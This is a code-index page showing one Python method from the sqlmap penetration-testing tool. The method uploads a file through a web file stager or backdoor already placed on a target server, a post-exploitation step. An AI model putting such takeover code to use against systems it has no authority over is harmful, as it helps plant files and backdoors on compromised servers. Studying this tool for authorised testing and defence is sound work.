MCPcopy Index your code
hub / github.com/sqlmapproject/sqlmap / _webFileStreamUpload

Method _webFileStreamUpload

lib/takeover/web.py:116–146  ·  view source on GitHub ↗
(self, stream, destFileName, directory)

Source from the content-addressed store, hash-verified

114 return self._webFileStreamUpload(stream, destFileName, directory)
115
116 def _webFileStreamUpload(self, stream, destFileName, directory):
117 stream.seek(0) # Rewind
118
119 try:
120 setattr(stream, "name", destFileName)
121 except TypeError:
122 pass
123
124 if self.webPlatform in getPublicTypeMembers(WEB_PLATFORM, True):
125 multipartParams = {
126 "upload": "1",
127 "file": stream,
128 "uploadDir": directory,
129 }
130
131 if self.webPlatform == WEB_PLATFORM.ASPX:
132 multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION
133 multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE
134
135 page, _, _ = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
136
137 if "File uploaded" not in (page or ""):
138 warnMsg = "unable to upload the file through the web file "
139 warnMsg += "stager to '%s'" % directory
140 logger.warning(warnMsg)
141 return False
142 else:
143 return True
144 else:
145 logger.error("sqlmap hasn't got a web backdoor nor a web file stager for %s" % self.webPlatform)
146 return False
147
148 def _webFileInject(self, fileContent, fileName, directory):
149 outFile = posixpath.join(ntToPosixSlashes(directory), fileName)

Callers 1

webUploadMethod · 0.95

Calls 4

getPublicTypeMembersFunction · 0.90
getPageMethod · 0.80
seekMethod · 0.45
errorMethod · 0.45

Tested by

no test coverage detected